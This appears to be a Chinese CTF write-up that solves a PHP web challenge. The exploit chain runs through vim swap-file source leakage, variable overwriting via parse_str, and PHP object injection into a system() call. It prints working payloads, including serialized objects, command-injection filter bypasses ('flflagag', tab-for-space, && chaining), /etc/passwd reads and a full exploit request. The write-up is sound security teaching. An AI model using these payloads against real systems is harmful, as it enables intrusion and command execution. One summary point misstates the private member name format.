PHP反序列化漏洞

0x00 前言

  • 本次总结用到的题目是“2018全国大学生网络安全邀请赛”的赛题,题目名称为Web2。

0x01 通过vim源码泄露获取源代码

  • 拿到题目,只有一个Can you hack me?显示,F12查看也没有什么端倪。文件本身为index.php,访问.index.php.swp得到其vim交换文件,典型的源码泄露。在Linux中可以还原出index.php
vim -r index.php
  • 题目源代码如下:
<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come);
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>

0x02 PHP变量覆盖

  • 观察代码可知其定义了first,var,bbb,ccc变量,后面又判断它们的值是否为其他的值,很明显是变量覆盖问题。观察下列代码:
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;
            $$key = $value;
        }
        else{break;}
}
  • 如果不控制变量i的值的话,会将第一个GET参数进行赋值操作。再向下看:
@parse_str($_GET['a']);
  • 这句话会将GET参数a按照HTTP参数列表的方式解析,通过这一点可以构造更多的参数来覆盖后续的变量,所以我们构造URL:
/index.php?first=doller&a=var=give%26bbb=me%26ccc=flag
  • 总体来看传入了两个参数,一个是first参数,值为doller,用来通过foreach循环覆盖原有变量,过掉第一个条件,第二个参数是a,值为var=give%26bbb=me%26ccc=flag,在parse_str函数处会将这个参数进行parse,之后得到var,bbb,ccc,来覆盖后续的变量,过掉下面的if语句。这里注意要对&符号进行URL编码,即%26,不然服务器无法得到正确的值。

0x03 PHP反序列化

  • 到最内层只剩一个反序列化函数了,同时上面给出一个类:
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}
  • 接受一个POST参数come,然后对其进行反序列化。在反序列化时,PHP会先自动调用__wakeup魔术方法,这个方法又调用了waf方法进行过滤,然后在代码块结束时调用__destruct析构方法释放对象。
  • 观察代码可知,其要求类的成员method是一个字符串,值必须为echo,用来调用echo方法执行系统命令,同时要求类的成员args为一个数组,数组是echo方法的参数列表,即只有一个key-value,也就是host => 我们要传入的参数
  • 这里在构造对象字符串的时候有一个坑,就是两个成员都是私有成员,所以其参数名称为:%00类名%00成员名称,不知道这是个什么鬼设计,同时这里面是直接赋值的,反序列化时不会调用__construct方法。例如构造如下的POST参数:
come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:1:{s:4:"host";s:1:"a";}}
  • 就代表传入一个come对象,其method成员为echo,其args成员为host => a,稍微解释一下这个字符串:
  • O代表对象,s代表字符串,i代表整型,a代表数组
  • 声明对象本身:O:类名长度:类名:成员个数:{成员列表}
  • 其中成员列表为:method成员: s:成员名长度:成员名;s:成员值长度:成员值;args成员: s:成员名长度:成员名;a:数组元素个数:{s:数组Key长度:数组Key的值;s:数组value长度:数组value的值;}
  • 构造好之后,开始研究怎么绕过waf,一开始想到的是利用漏洞CVE-2016-7124,在输入的类成员个数的值大于实际成员个数值的时候,存在可以绕过__wakeup的漏洞,这样就不会执行waf方法了,构造POST参数:
come=O:4:"come":3:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:1:{s:4:"host";s:9:"cat /flag";}}
  • 这里面实际只有两个成员,但是声明的是3个,如果服务器存在该漏洞就会触发,但是测试之发现服务器并不存在该漏洞,那么只能尝试绕过waf的过滤。
  • waf中使用正则表达式对某些字符进行了过滤,还过滤了字符串flag,经过尝试发现,空格可以用TAB代替(URL编码为%09),想要执行多个命令可以使用&&来拼接(URL编码为%26%26),而对flag的过滤,我的直观想法是使用大写转小写,或者字符替换,其中大写转小写为:
echo 1&&typeset%09-l%09a&&a=Flag&&cat%09/$a
  • 这里使用typeset之后会自动将a变量的大写字母全部转为小写字母,然后再利用a变量进行操作。本地测试通过,但是实际测试服务器没能成功执行typeset这个指令。于是转而使用字符替换的方法:
echo 1&&a=Flag&&cat%09/${a/F/f}
  • 这里使用${a/F/f}的意思是,将字符串a中首次出现的模式F替换为f。,然后再利用a变量进行操作。本地测试通过,但是实际测试服务器依旧没能成功执行cat /${a/F/f}命令。我甚至都去看了根目录:
echo 1&&ls%09-l%09/
  • 都在根目录发现了flag文件,我甚至还去读取了/etc/passwd都成功了。不过最终依旧没能拿到flag,如果有大佬知道哪里不对的话请指点。
  • 更新:经过大佬指点,对于flag的绕过不必这么麻烦,因为实际上用的是替换,所以可以这样构造:
echo 1&&cat%09/flflagag
  • waf替换掉flag的操作只会进行一次,所以替换完了之后正好剩下一个flag,就可以绕过其限制,最终的Payload为:
POST /index.php?first=doller&a=var=give%26bbb=me%26ccc=flag HTTP/1.1
Host: d1caba9ae5ec40e2badd5759806b6b095e057623213f4e8e.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:1:{s:4:"host";s:16:"1%26%26cat%09/flflagag";}}
  • 得到答案:
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sun, 04 Nov 2018 15:30:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 61
Connection: keep-alive
<br>welcome!<br>1
flag{7387b9ee-4712-4519-95a9-bca321590110}

0x04 总结

  • 本题主要考察vim源码泄露、PHP变量覆盖、PHP反序列化漏洞以及参数过滤绕过的问题,下面进行一个小小的总结:
  • 使用vim编辑文件,强行退出后会保留一个形如.name.php.swp的文件,该文件可能会泄露源代码
  • PHP中有多种函数可以对变量的值进行设置,包括extract,parse_str等等,这些函数在使用的时候,如果传入的参数为$_GET或者$_POST这类攻击者可控的参数,就可能覆盖原有的变量,改变程序逻辑。
  • PHP使用unserialize方法用于反序列化,如果该方法的参数是攻击者可控的,可能会产生PHP反序列化漏洞。在反序列化时,会先调用__wakeup魔术方法,不会调用__construct魔术方法,在代码块结束时会调用__destruct方法进行清理。在序列化时调用的是__sleep方法。
  • PHP序列化对象时,要注意类的成员权限,特别是私有成员,其成员名字为%00类名成员名%00,保护成员名字为%00*成员名%00
  • PHP在反序列化时,低版本PHP存在CVE-2016-7124漏洞,如果传入的反序列化的对象,其声明的成员个数大于实际的成员个数,会触发漏洞允许攻击者绕过__wakeup魔术方法。
  • 遇到字符串过滤时,如果不是循环过滤,可以考虑类似flflagag这样的双写绕过方式。

一条评论

评论已关闭。